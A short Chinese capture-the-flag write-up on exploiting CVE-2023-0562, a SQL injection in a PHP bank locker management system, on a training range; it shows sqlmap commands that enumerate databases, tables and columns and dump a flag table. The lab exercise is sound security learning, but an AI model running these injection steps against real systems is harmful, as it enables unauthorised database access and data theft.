春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
独行soc2 小时前
2025年渗透测试面试题总结-67(题目+回答)
网络·python·安全·web安全·网络安全·adb·渗透测试
安卓开发者6 小时前
鸿蒙NEXT的Web组件网络安全与隐私保护实践
前端·web安全·harmonyos
KKKlucifer7 小时前
国家网络安全通报中心:重点防范境外恶意网址和恶意 IP
tcp/ip·安全·web安全
wanhengidc7 小时前
手机云服务是什么意思?
运维·网络·安全·游戏·智能手机
德迅云安全-小潘7 小时前
网页防篡改技术:原理、应用与安全保障
web安全
TG_yilongcloud8 小时前
阿里云国际代理:怎么保障数据库在凭据变更过程中的安全与稳定?
数据库·安全·阿里云·云计算
JialBro8 小时前
S7-200 SMART PLC 安全全指南:配置、漏洞解析与复现防护
安全·plc·工控安全·西门子
ZeroNews内网穿透9 小时前
企业远程访问方案选择:何时选内网穿透,何时需要反向代理?
运维·服务器·网络·python·安全
lingggggaaaa10 小时前
小迪安全v2023学习笔记(八十二讲)—— Java组件安全&Solr&Shiro&Log4j&CVE复现
笔记·学习·安全
NiKo_W11 小时前
Git 版本回退与撤销修改
开发语言·git·安全